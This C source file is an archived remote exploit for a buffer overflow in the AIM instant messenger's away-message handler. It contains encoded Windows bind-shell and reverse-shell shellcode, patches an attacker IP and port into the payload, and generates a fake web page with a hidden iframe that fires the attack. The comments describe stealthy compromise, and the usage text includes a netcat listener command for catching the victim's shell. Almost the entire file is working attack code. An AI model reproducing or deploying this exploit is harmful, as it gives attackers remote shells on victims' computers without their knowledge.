home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / aim / aolInstantMessengerMessageBOExp2.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  17KB  |  391 lines

---

1. /*
2.  * AIM Away Message Buffer Overflow Remote Exploit
3.  *   Exploit by John Bissell A.K.A. HighT1mes
4.  *
5.  * Exploit: 
6.  * ========
7.  *   aolInstantMessengerMessageBOExp.c v1.2 - fixes formatting issues...
8.  *
9.  * Vulnerable Software:
10.  * ====================
11.  *    - AIM 5.5.3588
12.  *    - AIM 5.5.3590 Beta
13.  *    - AIM 5.5.3591
14.  *    - AIM 5.5.3595
15.  *    and a couple others versions...
16.  *
17.  * If you want to try other return addressees for other versions of
18.  * AIM then edit the return address.. But the current one embedded 
19.  * will work for sure with all the AIM versions listed above.
20.  *
21.  * I used some of the metasploit shellcode for this exploit with some
22.  * modifications to get this into stealth mode so it is harder to 
23.  * detect the attack. Since I'm using metasploit shellcode that means this
24.  * exploit can be used on any NT type OS, like win2k, winnt, winxp across
25.  * any service pack.. I don't know about SP2 though I haven't tested
26.  * it yet.
27.  *
28.  * On a side note I pourposly did not include the download+exec shellcode
29.  * even though I have it because I'm sick and tired of these little
30.  * spam/adware bitchs messing peoples computers up for profit.. You can
31.  * still download/upload through the shell to the victim. It just 
32.  * isn't automated like download+exec would be.
33.  *
34.  * In my opinion the reverse connect (-r option) is the most dangerous
35.  * because you can encode your ip address and pick a port, and then 
36.  * when the victim visits the evil web page or email whatever.. then the
37.  * attack will automatically open his AIM even its not already open and
38.  * connect to you and then terminate the AIM process to be stealth so
39.  * the victim doesn't know what him them.. As I remind people in the
40.  * exploit usage you need to remember to use netcat to listen on a 
41.  * port you picked for the exploit to connect to...
42.  *
43.  * One reason I decided to include the generation of html code for 
44.  * this exploit is I noticed almost no puts small limits on the 
45.  * <IFRAME SRC=""> attribute. So when the victim connects to that
46.  * page or reads that email depending on the browser or client
47.  * The exploit will execute.. IE 6.0 is affected by default and 
48.  * Outlook Express 6 is affected by this problem when the security 
49.  * settings are set to the Internet Zone.
50.  *
51.  * Excuse the sloppy commandline interface I just wanted to get
52.  * this out to the public. 
53.  *
54.  * [ Original advisory posted by Secunia and iDEFENSE. ]
55.  *
56.  * Greets:
57.  * =======
58.  *   IsolationX, YpCat, DaPhire, route, #romhack,
59.  *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
60.  *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
61.  *   secunia, so1o, John Kerry, Peter Winter-Smith,
62.  *   and many others...
63.  *
64.  * Compiler: 
65.  * =========
66.  *    Visual C++ 6.0
67.  *
68.  * To compile you first must add ws2_32.lib to the Object/librarys modules:
69.  * text box under the Project -> Settings menu; then click on the link tab...
70.  */
71.  
72. #include <stdio.h>
73. #include <stdlib.h>
74. #include <string.h>
75. #include <windows.h>
76.  
77. /* Exploit Data */
78.  
79. char injection_vector[] =
80.  
81.     "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
82.     "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
83.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
84.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
85.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
86.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
87.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
88.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
89.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
90.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
91.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
92.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
93.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
94.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
95.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
96.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
97.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
98.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
99.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
100.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
101.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
102.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
103.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
104.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
105.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
106.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
107.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
108.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
109.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
110.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
111.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
112.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
113.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
114.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
115.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
116.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
117.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
118.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
119.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
120.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
121.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
122.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
123.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
124.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
125.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
126.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
127.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
128.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
129.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
130.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
131.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
132.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
133.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
134.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
135.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
136.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
137.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
138.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
139.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
140.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
141.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
142.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
143.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
144.     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
145.     "\x41\x41\x41\x41\x41\x41\x41\x41";
146.  
147.  
148.  
149.  
150. char bind_shellcode[] = 
151.  
152.     "\xEB\x26\x23\x38\x3B\x41\x41"
153.     "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
154.     "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
155.     "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
156.     "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
157.     "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
158.     "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
159.     "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
160.     "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
161.     "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
162.     "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
163.     "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
164.     "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
165.     "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
166.     "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
167.     "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
168.     "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
169.     "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
170.     "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
171.     "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
172.     "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
173.     "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
174.     "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
175.     "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
176.     "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
177.     "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
178.  
179.  
180.  
181. char reverse_shellcode[] =
182.  
183.     "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
184.     "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
185.     "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
186.     "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
187.     "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
188.     "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
189.     "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
190.     "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
191.     "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
192.     "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
193.     "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
194.     "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
195.     "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
196.     "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
197.     "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
198.     "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
199.     "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
200.     "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
201.     "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
202.     "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
203.     "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
204.     "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
205.     "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
206.     "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
207.  
208. /* Function Prototypes */
209.  
210. void print_usage(char *prog_name);
211. unsigned char xor_data(unsigned char byte);
212.  
213. /* Function Code */
214.  
215. int main(int argc, char *argv[])
216. {
217.     int i                           = 0;
218.     int raw_num                     = 0;
219.     unsigned long port              = 1337; /* default port for bind and reverse attacks
220. */
221.     unsigned long encoded_port      = 0;
222.     unsigned long encoded_ip        = 0;
223.     unsigned char print_raw_exploit = 0;
224.     unsigned char attack_mode       = 2;    /* bind attack by default */
225.     char ip_addr[256];
226.     char exploit[2048];
227.     char str_num[16];
228.     char *p1, *p2;
229.     FILE *EXPLOIT_FP;
230.     char outfile[512];
231.     WSADATA wsa;
232.  
233.     if (argc < 2) print_usage(argv[0]);
234.  
235.     /* process commandline */
236.     for (i = 0; i < argc; i++) {
237.         if (argv[i][0] == '-') {
238.             switch (argv[i][1]) {
239.             case 'r':
240.                 /* reverse connect */
241.                 strncpy(ip_addr, argv[i+1], 20);
242.                 attack_mode = 1;
243.                 break;
244.             case 'b':
245.                 /* bind */
246.                 attack_mode = 2;
247.                 break;
248.             case 'p':
249.                 port = atoi(argv[i+1]);
250.                 /* port */
251.                 break;
252.             case 'o':
253.                 print_raw_exploit = 1;
254.                 break;
255.             case 'e':
256.                 strncpy(outfile, argv[i+1], 256);
257.             }
258.         }
259.     }
260.  
261.   /* initialize the socket library */
262.   if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
263.     printf("Error: Winsock didn't initialize!\n");
264.     exit(-1);
265.   }
266.  
267.     /* build exploit */
268.     strncpy(exploit, injection_vector, strlen(injection_vector));
269.     exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
270.     encoded_port = htonl(port);
271.     encoded_port += 2;
272.  
273.     if (attack_mode == 1) {
274.  
275.     /* reverse connect attack */
276.     reverse_shellcode[196] = (char) 0x90;
277.     reverse_shellcode[197] = (char) 0x92;
278.     reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
279.     reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));
280.  
281.     p1 = strchr(ip_addr, '.');
282.     strncpy(str_num, ip_addr, p1-ip_addr);
283.     raw_num = atoi(str_num);
284.     reverse_shellcode[191] = xor_data((char)raw_num);
285.  
286.     p2 = strchr(p1+1, '.');
287.     strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
288.     raw_num = atoi(str_num);
289.     reverse_shellcode[192] = xor_data((char)raw_num);
290.  
291.     p1 = strchr(p2+1, '.');
292.     strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
293.     raw_num = atoi(str_num);
294.     reverse_shellcode[193] = xor_data((char)raw_num);
295.  
296.     p2 = strrchr(ip_addr, '.');
297.     strncpy(str_num, p2+1, 5);
298.     raw_num = atoi(str_num);
299.     reverse_shellcode[194] = xor_data((char)raw_num);
300.  
301.     strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
302.  
303.     }
304.     if (attack_mode == 2) {
305.  
306.     /* bind attack */
307.     bind_shellcode[204] = (char) 0x90;
308.     bind_shellcode[205] = (char) 0x92;
309.     bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
310.     bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
311.     strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
312.  
313.     }
314.  
315.     WSACleanup();
316.  
317.     /* output exploit */
318.     if (print_raw_exploit == 1) {
319.  
320.         printf("%s", exploit);
321.  
322.     }
323.     else {
324.  
325.     if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
326.         fprintf(stderr, "Error: Exploit file can't be created!\n");
327.         exit(-1);
328.     }
329.  
330.     fprintf(EXPLOIT_FP, "<html>\n");
331.     fprintf(EXPLOIT_FP, "<head>\n");
332.     fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
333.     fprintf(EXPLOIT_FP, "</head>\n");
334.     fprintf(EXPLOIT_FP, "<body>\n");
335.     fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
336.     fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
337.     fprintf(EXPLOIT_FP, "%s", exploit);
338.     fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
339.     fprintf(EXPLOIT_FP, "</body>\n");
340.     fprintf(EXPLOIT_FP, "<html>\n");
341.  
342.     fclose(EXPLOIT_FP);
343.  
344.     /* im too lazy to make a macro for this banner :P */
345.     printf(" +-------------------------------------------------+\n");
346.     printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
347.     printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
348.     printf(" +-------------------------------------------------+\n\n");
349.  
350.     printf(" Exploit created!\n\n");
351.  
352.     printf(" Remember if you use the -r option to have netcat listening\n");
353.     printf(" on the port you are using for the attack so the victim will\n");
354.     printf(" be able to connect to you when exploited...\n\n");
355.     printf(" Example:\n");
356.     printf("\tnc.exe -l -p %d", port);
357. }
358.  
359.     return(EXIT_SUCCESS);
360. }
361.  
362. void print_usage(char *prog_name)
363. {
364.     printf(" +-------------------------------------------------+\n");
365.     printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
366.     printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
367.     printf(" +-------------------------------------------------+\n\n");
368.     printf(" Exploit Usage:\n");
369.     printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
370.     printf(" Parameters:\n");
371.     printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\tand choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or -b then a bind\n\t\t\t\t attack will be generated.\n\n");
372.     printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect  then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
373.     printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If you would like output go straight to\n\t\t\t\t standerd output then specify the -o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create the exploit file which is basically\n\t\t\t\t a simple html file. The -o option is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different ways.\n\n");
374.     printf(" Examples:\n");
375.     printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
376.     printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
377.     printf("\t%s -b -o\n", prog_name);
378.     printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
379.     printf(" Remember if you use the -r option to have netcat listening\n");
380.     printf(" on the port you are using for the attack so the victim will\n");
381.     printf(" be able to connect to you when exploited...\n\n");
382.     printf(" Example:\n");
383.     printf("\tnc.exe -l -p 8888");
384.     exit(-1);
385. }
386.  
387. unsigned char xor_data(unsigned char byte)
388. {
389.     return(byte ^ 0x92);
390. }
391.